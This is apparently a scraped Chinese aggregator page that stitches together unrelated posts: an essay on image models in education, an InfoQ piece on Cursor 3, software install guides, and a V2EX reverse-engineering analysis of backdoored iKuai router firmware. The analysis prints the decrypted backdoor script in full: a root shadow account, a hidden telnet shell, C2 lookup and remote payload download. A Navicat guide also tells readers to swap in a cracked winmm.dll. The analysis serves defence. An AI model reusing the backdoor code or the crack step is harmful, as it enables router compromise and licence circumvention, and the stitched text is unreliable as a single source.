是一大堆产品。

面向 K12 的同步教辅。

面向幼教的绘本和识字卡。

面向教培机构的课件工厂。

面向国际学校的双语教学素材。

面向老师个人的备课助手。

面向出版机构的存量教材翻新。

甚至再往外一点,企业培训、职业教育、科普内容,全部都能吃这套能力。

你如果关注这个领域的话,应该知道教育行业一直有个很反常识的地方。

它表面上看起来没那么性感。

但它其实是最典型的内容制造业。

而且很多内容,还必须一遍一遍重做。

愚钝如我,刷了几轮官方案例之后,才后知后觉地反应过来,这一波真正该紧张的,可能不是做海报的人。

而是那些还在靠人工一点点拼教材、拼课件、拼练习册的老工作流。

今天按小学三年级做一版。

明天按五年级认知再改一版。

今天做中文。

明天做英文。

今天是老师上课用的。

明天还得拆成家长陪练版。

这种高频、琐碎、重复、带一点创意、又带一点严谨的活,简直就是模型最适合先吃掉的一片地。

我有时候觉得,很多人对图像模型的理解还停在上一代。

总觉得它们只是娱乐工业的外挂。

能做头像。

能做海报。

能做封面。

能在社交媒体上引发一波转发。

但这一代开始不一样了。

当它终于有了更好的文字表现、更好的多轮修改、更好的知识图示能力之后,它杀进去的就不只是内容消费。

它开始碰内容生产了。

而教育,偏偏就是内容生产最重的行业之一。

这话听着有点刺耳但,我一直觉得,真正厉害的技术升级,最早改变的常常不是最光鲜的行业。

不是画廊。

不是大片海报。

不是潮流视觉。

而是那些每天要重复生产一万次内容、却又一直没有被好好服务的地方。

印刷机先改变的,也不是诗人。

是出版。

Excel 先改变的,也不是数学家。

是财务。

那 GPT Image 这一波先改变谁。

我反正越来越觉得,教育八成跑不掉。

当然,话还是得说回来。

现在离真正成熟,还差一截。

模型会翻车。

长文本会歪。

复杂版式会乱。

知识内容也不可能完全不审。

所以别一上来就做那种全自动、零老师参与、零人工质检的梦。

那种梦,醒得会很快。

但如果你把它当成一个超强的内容实习生,一个会画图、会改图、会延续风格、还知道一点世界知识的素材生产员。

那这事就已经非常恐怖了。

因为教育行业里最缺的,不是灵感。

是稳定的大规模内容产能。

而 GPT Image 现在最吓人的地方,恰好就在这里。

所以别再只拿它生成抖音乐子了。

真正离谱的,不是它把一张图做得多炸。

是真有一批人,可以拿着它,重新做一遍教材、课件、讲义、练习册和教辅产品。

到那个时候,被杀死的可能就不是比赛。

而是一整套老工作流。

大时代啊,朋友们。

以上,既然看到这里了,如果觉得不错,随手点个赞、在看、转发三连吧,如果想第一时间收到推送,也可以给我个星标⭐~

谢谢你看我的文章,我们,下次再见。

/ 作者,文浩 / Web,wenhaofree.com 原文:https://mp.weixin.qq.com/s/CBQBfRliLrSA1CwRTUs07Q

Anysphere 最近发布了 Cursor 3,对其 AI 编程工具进行了全面重构。新版本将核心交互模式从文件编辑转向对并行编码智能体的管理。界面为全新设计,并非基于 Cursor 现有的 VS Code 分支扩展而来,不过用户可随时切换回完整 IDE 模式。

Cursor 3 的核心理念是:开发者应将更多时间用于编排智能体,而非直接编辑代码,工具设计也应贴合这一现状。联合创始人 Michael Truell 与 Sualeh Asif 将其形容为“与智能体协同构建软件的统一工作空间”,并将其定位为 Truell 所说的软件开发第三时代的重要一步——在这一时代,智能体集群将自主完成工作并交付变更。Cursor 自身的使用数据也印证了这一转变:2025 年 3 月,使用标签补全功能的用户数量还是使用智能体用户的 2.5 倍,如今这一比例已完全反转,使用自主智能体的用户数量是前者的两倍。而在 Cursor 内部工程团队中,有 35% 的合并拉取请求均由自主云端智能体编写完成。

新界面会在侧边栏中展示所有正在运行的智能体,包括本地智能体与云端智能体。无论是在移动端、网页端、桌面端,还是通过 Slack、GitHub、Linear 启动的智能体都会统一集中显示。云端智能体会自动生成演示内容与工作截图,供人工审核。用户可在不同代码仓库中并行运行多个智能体,而此前的界面并未原生支持这一功能。

(来源:Cursor 博客文章

本地与云端之间的切换功能值得正在评估这类工具的团队重点关注。本地运行的智能体会话可迁移至云端,开发者在离线或处理其他任务时智能体仍能继续工作;反之,云端会话也可以拉回本地,进行手动编辑与测试。Cursor 表示切换的速度很快,但并未公布具体的延迟数据。云端采用的是 Composer 2——Cursor 自研的前沿编码模型,据称比第三方模型拥有更高的使用限额。

全新的插件市场支持团队通过 MCP、Skill 与子智能体来扩展智能体能力。企业组织还可搭建专属的私有市场,用于进行内部插件管理,这满足了类似 AWS 在其智能体注册表(Agent Registry)中所解决的治理问题,只是二者所处的技术栈层级不同。

社区在 RedditHacker News 上的反馈呈现出明显的两极分化,反对声音主要集中在:Cursor 是否正在抛弃最初吸引用户的、以 IDE 为核心的产品定位。

正如一位 Reddit 用户所言:

这种视图会让人完全脱离代码本身……我之所以选择继续使用 Cursor,是因为它作为 IDE 来说表现十分出色。

而一位 Hacker News 评论者则分析了为何智能体优先模式在部分工作流程中会让人感到不适:

审查测试代码、频繁切换上下文、管理模型上下文、精心设计提示词引导模型生成正确结果……这些操作在精神上极度消耗精力且充满打断感,让人几乎无法进入专注的心流状态。而与大语言模型协作恰恰完全相反。

另一位 Hacker News 评论者点出了产品设计层面的核心矛盾:

智能体优先模式需要环境化、后台化的自主性,而代码优先模式则需要精准的同步控制。试图在一款产品中同时兼顾二者,就意味着你做出的每一次权衡总会让一半用户感到失望。

此外,Reddit 讨论区的用户还表达了对供应商锁定的担忧。有评论者表示:“我想要的智能体指挥中心应该能够管理我所有的 AI 智能体,而不是被绑定在某一家供应商上。”对此,Cursor 版主 Lee Robinson 回应称,Cursor 支持所有厂商的模型。

成本问题在两个讨论串中被反复提及。一位从 Cursor 转向 Claude Code 的 Hacker News 评论者表示,在 Cursor 中使用高级模型每周花费高达“2000 美元”,而切换到 Claude Code Max 后,他称自己“效率不变,但成本仅为原来的十分之一”。一名 Reddit 用户则提到,同一模型在不同工具中的词元消耗量差异极大,据其估算,某工作流程在 Claude Code 中日用量为 12%,而在 Cursor 中则达到 80%。

如果这些反馈具有代表性,说明工具在构建上下文、管理接口调用的方式上会对实际使用成本产生显著影响。对于评估智能体优先类工具的团队来说,其重要性不亚于界面设计。

此次发布让 Cursor 与 Claude Code、GitHub Copilot 的智能体模式形成了更直接的竞争,后两者同样在向自主多步执行方向演进。三者的实现思路差异颇具参考价值:Claude Code 是以可由开发者在终端调用的 CLI 工具形式运行,GitHub Copilot 仍内嵌在 IDE 中,而 Cursor 如今则打造了专属界面,将 IDE 视作备选方案,而非核心交互界面。

Cursor 3 现已正式上线。用户可在升级 Cursor 后通过快捷键 Cmd+Shift+P 并选择 Agents Window 来打开全新界面。

【声明:本文由 InfoQ 翻译,未经许可禁止转载。】

查看英文原文:https://www.infoq.com/news/2026/04/cursor-3-agent-first-interface/

 Android Studio是基于JetBrains的IntelliJ IDEA软件并由Google推出的,是一个用于Android开发的功能齐全的集成开发环境。Android Studio的代码编辑器支持多种编程语言

一、准备工作

安装包下载:https://pan.xunlei.com/s/VOqYRWzZc_gdgBBND-3ETziSA1?pwd=cnvx#,下载好【Android Studio 2022】压缩包,建议保存到电脑本地磁盘(如 D 盘)。

二、安装 Android Studio 2022

  1. 解压与运行

    • 右键【Android Studio 2022】压缩包 → 选择 解压到当前文件夹
    • 进入解压后的文件夹,右键 Setup​ → 以管理员身份运行

  2. 安装向导

    • 连续点击 Next,在安装路径界面将 C​ 改为 D(例如:D:\Android\Android Studio)→ Next
    • 点击 Install​ 开始安装,完成后点击 Next​ → Finish

三、初始配置与 SDK 下载

  1. 首次启动设置

    • 弹出导入设置窗口,点击 OK​ → 选择 Don't send(不发送使用数据)。
    • 点击 Cancel​ 跳过向导,连续点击 Next
    • 选择界面主题(推荐 Darcula​ 深色模式)→ Next

  2. 配置 SDK 组件

    • 勾选需要的组件(如 Android Virtual Device),点击 文件夹图标
    • 在 D 盘新建 Android Studio2022​ 文件夹作为 SDK 路径 → OK
    • 连续点击 Next​ → 勾选 I accept​ → Finish
    • 等待 SDK 下载安装完成(需联网,耗时视网速而定)。

四、创建项目与汉化

  1. 新建测试项目

    • 点击 New Project​ → Next
    • 修改项目路径:C​ 改为 D(例如:D:\AndroidProjects)。
    • 选择开发语言(如 Java)→ Finish
    • 等待 Gradle 构建完成(首次较慢,请耐心等待)。

  2. 安装中文插件

    • 将解压包内的 中文版.zip​ 直接拖入 Android Studio 界面。
    • 点击弹窗中的 Restart​ 重启软件 → 点击 Exit​ 关闭欢迎页。

五、验证安装

重启后界面显示为 简体中文,且能正常创建/运行项目,即表示安装成功 ✅。

前阵子在恩山看到有用户在宣传 iKuai 插件版,价格几百一个授权还提供一个 7 天试用的密钥。嚯,一看一堆插件支持,其中还有疑似 Clash 的小猫咪。当然我很感谢他们让我把软路由玩爽了,一想爱快云平台只有那 1 个冷冰冰的 Docker 就不寒而栗...

undefined

他们的闲鱼 ID 分别是:公路暴走的榛子、伦敦天蝎座海牛。还有个曾用名:金陵巨蟹座佩奇(他们有多个某鱼小号注意鉴别马甲),至于他们的固件比爱快官方还要 bt ,这些贩子销售所谓的 iKuai"企业版"固件,声称包含 Docker 、Shell 等企业版功能。实际上,这些固件通过植入后门程序实现插件加载,同时在用户路由器上留下多个后门账户。

undefined

本文完整记录了逆向分析过程。

1. 固件提取

1.1 获取 rootfs

# 使用 Nyarc 解密 iKuai 固件
nyarc --ikuai-decrypt firmware.bin -o decrypted.xz

# 解压 XZ (必须 CRC32 )
xz -d decrypted.xz

# 挂载 ext2 rootfs
mkdir /tmp/xyrm
mount -o loop decrypted /tmp/xyrm

1.2 发现异常文件

# 标准 iKuai 不应该有这个文件
ls -la /tmp/xyrm/sbin/replace_files
# -rwxr-xr-x 1 root root 42240 ... replace_files

ls -la /tmp/xyrm/sbin/appinst.bin.pkg
# -rw-r--r-- 1 root root 26288 ... appinst.bin.pkg (Salted__加密)

1.3 Nyarc 安全扫描发现后门

nyarc --scan /tmp/xyrm

输出(节选):

[CRITICAL] Hardcoded Password
  /etc/shadow: 3 个异常账户
    root:$1$...:17857    ← 后门密码
    sshd:$1$...:17857    ← 后门密码  
    iksshd:$1$...:17857  ← 后门账户(标准 iKuai 无此用户)

[CRITICAL] Backdoor Detected
  /sbin/replace_files: 42KB ELF, 非标准 iKuai 文件
  
🟠 [HIGH] Telnet Backdoor
  /etc/setup/rc: telnetd -p 65500 -l /bin/ash
  ← 隐藏 Telnet 后门,端口 65500

2. replace_files 逆向

2.1 基本信息

file /tmp/xyrm/sbin/replace_files
# ELF 64-bit LSB executable, x86-64, statically linked

strings /tmp/xyrm/sbin/replace_files | grep -i "bash\|script\|tmp"
# /bin/bash -s
# /tmp/script_out_
# /tmp/script_err_
# kworker/u8:1-ev    ← 伪装成内核线程!

关键发现:

  • 静态链接 ELF ,42KB
  • 通过/bin/bash -s执行嵌入的脚本
  • 伪装进程名为kworker/u8:1-ev(模仿内核工作线程)
  • 输出重定向到/tmp/script_out_XXXXXX

2.2 Ghidra 反编译

使用 Ghidra headless 模式反编译:

# 导入并分析
analyzeHeadless /tmp/ghidra_rf rf_proj -import replace_files

# 反编译所有函数
analyzeHeadless /tmp/ghidra_rf rf_proj -process replace_files \
  -postScript DecompileAll.java

2.3 核心函数分析

main 入口( FUN_0040168a )

void FUN_0040168a(undefined4 param_1, undefined8 *param_2)
{
    // 1. 伪装进程名
    uVar1 = FUN_00405a20(*param_2);
    FUN_00405aa0(*param_2, "kworker/u8:1-ev", uVar1);
    
    // 2. 解密嵌入的脚本
    FUN_004016e8(&DAT_0040b0a0, &DAT_0040a040, 0xdd1);
    //           ^输出缓冲区    ^加密数据       ^长度=3537 字节
    
    // 3. 执行解密后的脚本
    FUN_004010e9(&DAT_0040b0a0, param_1, param_2);
}

解密函数( FUN_004016e8 )— 核心!

void FUN_004016e8(long output, undefined8 encrypted_data, uint data_len)
{
    // 1. 生成 1024 字节查找表(类似 iKuai rootfs 的 sbox !)
    for (i = 0; i < 0x400; i++) {
        sbox[i] = key[i & 0xf] + ((char)(i + 1) * -0x22);
        //        ^16 字节密钥     ^乘以-0x22(即-34)
    }
    
    // 2. 逐字节解密:减法 + 位旋转
    for (i = 0; i < data_len; i++) {
        bVar4 = (sbox[i & 0x3ff] + (char)data_len) & 0xFF;
        
        // 计算旋转位数:bVar4 % 7 + 1
        // Ghidra 显示的是编译器优化后的除法(乘 0x25 右移 8 )
        cVar1 = (bVar4 * 0x25) >> 8;
        div7 = (cVar1 + ((bVar4 - cVar1) >> 1)) >> 2;
        shift = bVar4 - div7 * 7 + 1;
        
        // 解密操作:减去 bVar4 ,然后左旋转 shift 位
        data[i] = ROL((data[i] - bVar4) & 0xFF, shift);
    }
}

2.4 密钥提取

从 ELF 的数据段提取:

with open('replace_files', 'rb') as f:
    elf = f.read()

# 解析 ELF program headers 找到文件偏移
# DAT_0040ae20 (虚拟地址) → 0x9e20 (文件偏移)
# DAT_0040a040 (虚拟地址) → 0x9040 (文件偏移)

key = elf[0x9e20:0x9e20+16]
# 密钥: 88b1f1937a2cb39d5383953eb38a5368

encrypted_data = elf[0x9040:0x9040+0xdd1]
# 3537 字节加密数据

2.5 Python 解密实现

key = elf[0x9e20:0x9e20+16]
enc_data = bytearray(elf[0x9040:0x9040+0xdd1])
data_len = 0xdd1  # 3537

# 生成 sbox
sbox = bytearray(1024)
for i in range(1024):
    sbox[i] = (key[i & 0xf] + ((i + 1) * (-0x22 & 0xFF))) & 0xFF

# 解密
dec = bytearray(len(enc_data))
for i in range(len(enc_data)):
    bVar4 = (sbox[i & 0x3ff] + (data_len & 0xFF)) & 0xFF
    
    # shift = bVar4 % 7 + 1 (编译器优化还原)
    cVar1 = (bVar4 * 0x25) >> 8
    div7 = (cVar1 + ((bVar4 - cVar1) >> 1)) >> 2
    shift = (bVar4 - div7 * 7 + 1) & 0x1F
    
    # 解密:减去 bVar4 ,然后 ROL
    val = (enc_data[i] - bVar4) & 0xFF
    val = ((val << shift) | (val >> (8 - shift))) & 0xFF
    dec[i] = val

print(bytes(dec).decode())

3. 解密后的后门脚本

完整解密输出( 3537 字节 bash 脚本):

#!/bin/bash

# ===== 后门 1: 添加 SSH 后门账户 =====
iksshd=`cat /etc/shadow|grep "iksshd"|wc -l`
if [ $iksshd -eq 0 ];then
echo 'iksshd:$1$ebBzICAY$5CaSyktzPh8SEUYMHdzhf1:17857:0:99999:7:::' >>/etc/shadow
echo 'iksshd:x:0:0:iksshd:/root:/bin/ash' >>/etc/passwd
fi
# iksshd 账户: UID=0(root 权限), 密码 hash 已知

# ===== 后门 2: C2 通信 =====
check_network() {
    while true; do
        ping -c2 qq.com >/dev/null 2>&1 && break
        ping -c2 163.com >/dev/null 2>&1 && break
        ping -c2 baidu.com >/dev/null 2>&1 && break
        sleep 5
    done
}

# ===== 后门 3: 远程控制服务器 =====
REG_SERVER="patch.ikuai8.cn"      # 伪装成 iKuai 官方域名
REG_SERVER2="www.ikuai8.cn"       # 备用
oss_cn_beijing="https://ikuai8-app.oss-cn-beijing.aliyuncs.com"

wget_file(){
    # 通过 DNS TXT 记录获取真实 C2 地址
    regaddr=$(curl -s "https://doh.pub/dns-query?name=${REG_SERVER}&type=TXT" \
              | jq -r '.Answer[].data' | sed -E 's/"//g')
    
    # 备用 DNS
    if [ -z "$regaddr" ]; then
        regaddr=$(curl -s "https://dns.alidns.com/resolve?name=${REG_SERVER2}&type=TXT" \
                  | jq -r '.Answer[].data' | sed -E 's/"//g')
    fi
    
    # 最终备用:硬编码动态 DNS
    if [ -z "$regaddr" ]; then
        regaddr="http://bdoptical2.vicp.cc:8081"
    fi
    
    # 通过 C2 服务器签名 OSS URL
    SIGNED_SER="$regaddr/generate_signed_url.php?url="
    SIGNED_URL=$(curl -s "$SIGNED_SER$oss_cn_beijing/$1")
    echo $SIGNED_URL
}

# ===== 后门 4: 无限循环下载+安装插件 =====
while true; do
    check_network
    sleep 15

    # 下载版本信息
    downloaded_version=`curl -sL $(wget_file "appinst_ver/version_rom")`
    
    # 下载 pmd 数据库(加密的 JSON )
    wget -O /tmp/iktmp/app_up/db \
         $(wget_file "appinst_ver/appinst_$downloaded_version") -q
    
    # 下载插件包( AES 加密的 tar.gz )
    wget -O /tmp/iktmp/app_up/appinst.bin.pkg \
         $(wget_file "appinst_ver/appinst_$downloaded_version.bin.ikp") -q

    if [ -s /tmp/iktmp/app_up/db ] && [ -s /tmp/iktmp/app_up/appinst.bin.pkg ]; then
        # 覆盖 pmd 数据库
        cp /tmp/iktmp/app_up/db /etc/log/packages/db/.__DB.3.x86_64
        
        # 放置插件包
        cp /tmp/iktmp/app_up/appinst.bin.pkg /etc/log/packages/appinst.bin.pkg
        
        # 重启 pmd ( iKuai 插件管理器)强制加载
        killall pmd
        rm /tmp/packages -r
        pmd
        sleep 30
    fi

    # 安装成功则退出,否则永远重试
    if [ -f /tmp/ikpkg/appinst/version ]; then
        exit
    fi
    
    # 清理重试
    rm /etc/log/packages/*.pkg -f
done

4. 后门清单

# 类型 详情 危害等级
1 SSH 后门账户 iksshd (UID=0, root 权限) 严重
2 Telnet 后门 端口 65500, /bin/ash 严重
3 进程伪装 伪装为kworker/u8:1-ev内核线程
4 C2 通信 DNS TXT 查询获取控制服务器地址 严重
5 远程下载 从阿里云 OSS 下载任意代码执行 严重
6 pmd 注入 覆盖官方插件数据库加载恶意插件 严重
7 无限循环 后门脚本永不退出,持续尝试
8 禁用 bash /etc/setup/rc中移除 bash ,防止用户排查

C2 基础设施

patch.ikuai8.cn          → DNS TXT → 真实 C2 地址
www.ikuai8.cn            → 备用 DNS TXT
bdoptical2.vicp.cc:8081  → 硬编码备用 C2 (花生壳动态域名)
ikuai8-app.oss-cn-beijing.aliyuncs.com → 插件存储(阿里云 OSS )

C2 服务器功能:
  /generate_signed_url.php → 生成 OSS 签名下载链接

5. 加密算法对比

replace_files vs iKuai rootfs

特性 replace_files iKuai rootfs
算法 自定义 sbox+位旋转 自定义 sbox+XOR
密钥长度 16 字节 16 字节
sbox 大小 1024 字节 256 字节(uint32 溢出)
操作 减法+ROL XOR
密钥存储 ELF 数据段 vmlinuz/rootfs 末尾

两者思路一致:生成查找表→逐字节变换。可能是同一作者/团队。

6. Nyarc 自动化检测

Nyarc 可以自动检测此类后门:

# 固件检测
nyarc --fw-detect xianyu_firmware.bin
# → iKuai 3.7.x (modified)

# 安全扫描
nyarc --scan /path/to/rootfs
# → CRITICAL: Hardcoded password in /etc/shadow
# → CRITICAL: Unknown ELF in /sbin/replace_files
# → HIGH: Telnet on non-standard port 65500

# 加密分析
nyarc --crypto-scan /sbin/replace_files
# → Custom encryption detected (sbox + rotation)

# 完整报告
nyarc --report xianyu_firmware.bin report.txt

7. 工具

  • Nyarc: 固件分析工具
  • Ghidra: NSA 逆向工程框架 — ELF 反编译
  • Python: 解密脚本实现

本文仅发布于 V2EX 使用 Nyarc v1.0.0 + Ghidra 11.3.2 测试

痛点

之前我一直用 Gitea 仓库放 config.yaml ,然后各设备订阅 Raw 文件链接。用是能用,但痛点不少:

  1. 安全性:Raw 链接一旦泄露(被扫),别人直接就能拿到我所有节点信息
  2. 自定义不便:想临时改个规则、切个分组,手机上操作又比较麻烦,手动拼接 YAML 不仅繁琐还容易出错
  3. 如果切换了供应商,一些自定义配置又得重来,虽然说已经有类似的订阅转换东西,但是你的自定义配置肯定是想要保密、并且编辑方便

于是做了( Vibe coding )这个 Clash Config Store 项目,一个订阅编排与分发平台。

核心思路很简单:

  1. 在 Web UI 里像搭积木一样,把上游订阅源、规则集、自定义代理组拼成一个完整配置
  2. 系统给你生成一个带 Token 的专属订阅链接
  3. 你的所有 Clash 客户端都填这一个链接,后续任何修改(加节点、改规则)都会自动同步到所有设备

特性:

  1. 多上游聚合、配置模板复用、自定义 YAML 节点、访问日志与 IP 限制、支持中英文和深色模式
  2. 支持 Docker compose 一键部署,支持使用 sqlite (默认)、mysql/miradb 作为数据库

后端 Go + 前端 React (shadcn/ui),已打包 Docker 镜像 shine09/clash-config-store,自部署既安全又省心。

需要坦诚说明的是:这项目是 Vibe Coding 的产物,肯定有考虑不周全的地方,未来也可能有破坏性更新。
系统级管理功能(比如是否开放注册)还没做,所以建议先搭建在自己的内网或安全环境里使用,权当预览版尝尝鲜。

欢迎各位 V 友试用、拍砖、PR ,也希望能给同样折腾配置的朋友省点事 👏

Navicat Premium 17 数据库管理软件和数据库开发工具,直观和设计完善的图形用户界面简化了数据库管理和开发。

一、安装准备

二、主程序安装

1. 解压安装包

右键点击【Navicat Premium 17】压缩包 → 选择【解压到 Navicat Premium 17】。

2. 运行安装程序

打开解压后的文件夹 → 右键【navicat170_premium_en_x64】→ 选择【以管理员身份运行】。

3~5. 接受许可协议与路径设置

  • 点击【Next】(下一步)。
  • 勾选【I accept...】(我接受许可协议)→ 点击【Next】。
  • 修改路径地址中的首字符“C”可更改安装位置(例如将 C 改为 D)→ 点击【Next】。

6~8. 完成安装

连续点击【Next】(下一步)→ 点击【Install】(安装)→ 等待进度条完成 → 点击【Finish】(完成)。

三、步骤(DLL 补丁)

9. 复制补丁文件

打开解压包中的【Crack】文件夹 → 右键【winmm.dll】→ 选择【复制】。

10~12. 替换原文件

  • 右键桌面【Navicat Premium 17】图标 → 选择【打开文件所在的位置】。
  • 在空白处右键 → 选择【粘贴】。
  • 弹出提示框,选择【替换目标中的文件】。

四、验证安装

13. 启动软件

双击桌面【Navicat Premium 17】图标。

14. 安装成功

成功进入 Navicat 主界面,表示安装与完成,可开始连接和管理数据库。

 ScreenToGif中文版是一款免费开源的便携式GIF动画制作工具。ScreenToGif中文版能够记录您的屏幕上的任何内容并将其保存为GIF动画

一、准备工作

安装包下载:https://pan.xunlei.com/s/VOqYJCFmAKjmSRSj2NXXcW_iA1?pwd=vipc#,先下载好【ScreenToGif】压缩包,保存到电脑本地。

二、安装 ScreenToGif

  1. 解压安装包

    找到下载的【ScreenToGif】压缩包,右键点击 → 选择【解压到“ScreenToGif”】。

  2. 运行安装程序

    打开解压后的文件夹,双击运行【ScreenToGif.2.34.1.Setup】。

  3. 按向导安装

    • 点击【下一步】;
    • 自定义安装路径:将路径中的 C盘改为 D盘(如 D:\Program Files\ScreenToGif)→【安装】;
    • 等待安装进度完成。

三、验证安装

安装完成后,在开始菜单或桌面找到 ScreenToGif 图标,双击启动软件,能正常打开录制界面即表示安装成功!

主包中年单身,产品经理岗位,已经确定被裁,有几十万的存款,基本上跟房贷持平(可以一次还清)。
可以选择路径:
1. [找工作] 找一个同类型工作,继续内卷。但是要接受薪资大幅下滑的现实。
2. [躺平] 先调整心态,什么时候休息好了,再想接下来的工作。
3. [回老家] 把房子卖了,然后回老家发展(北方省会级城市)。
4. [创业] 通过 ai 搞一些一人公司的小项目,小而美赚生活费。
5. [自媒体] 通过工作经验,写一些干货做视频,分享一些自己的项目经历。

像一个从家里被赶出来淋雨的孩子,挺迷茫的,大家有没有成功的案例呀?

买了家宽 vps,链式代理到机场的话还需要搭优化路线吗?

不知道是 BUG 还是阿里云为了多吐 token 挣钱干的昧良心的事

之前我就发现它会反复说几百个字,我以为是我眼花了,后来觉得可能是偶尔情况,也没咋在意

今天才忙一会儿就用了 4000 万 token,我盯着看了一会 就发现他会一直重复自己的逻辑 反复说那一段话 说了很多次才开始干活

是在 opencode 里面用的 不清楚是什么原因,但是很操蛋 coding plan 也抢不到 一天要几百块 感觉是消费不起了

  1. 1
  2. ...
  3. 75
  4. 76
  5. 77
  6. 78
  7. 79
  8. 80
  9. 81
  10. ...
  11. 125